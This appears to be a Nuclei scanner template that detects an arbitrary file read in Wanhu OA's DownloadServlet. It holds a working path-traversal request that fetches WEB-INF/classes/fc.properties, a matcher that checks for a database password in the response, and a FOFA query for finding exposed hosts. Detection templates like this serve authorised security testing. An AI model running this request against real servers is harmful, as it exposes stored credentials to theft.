30 lines
1.5 KiB
YAML
30 lines
1.5 KiB
YAML
id: wanhuoa-downloadservlet-lfi
|
|
|
|
info:
|
|
name: Wanhu OA DownloadServlet - Remote File Disclosure
|
|
author: wpsec
|
|
severity: high
|
|
description: |
|
|
There is an arbitrary file reading vulnerability in the Wanhu OA DownloadServlet interface. An attacker can use the vulnerability to read sensitive files in the server and obtain sensitive information.
|
|
reference:
|
|
- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
|
|
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: app="万户网络-ezOFFICE"
|
|
tags: oa,wanhu,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code == 200"
|
|
- "contains(body,'ccerp.password')"
|
|
- "contains(header,'application/x-msdownload')"
|
|
condition: and
|
|
# digest: 4a0a00473045022100b228dc4e3eaf62093f8dde3f6ab30a815d93c41fb0ccf06de4160ee939bf90060220367e764c86484bc4f38116b298dc445b71017a667b777e7d1534a40feb98e148:922c64590222798bb761d5b6d8e72950 |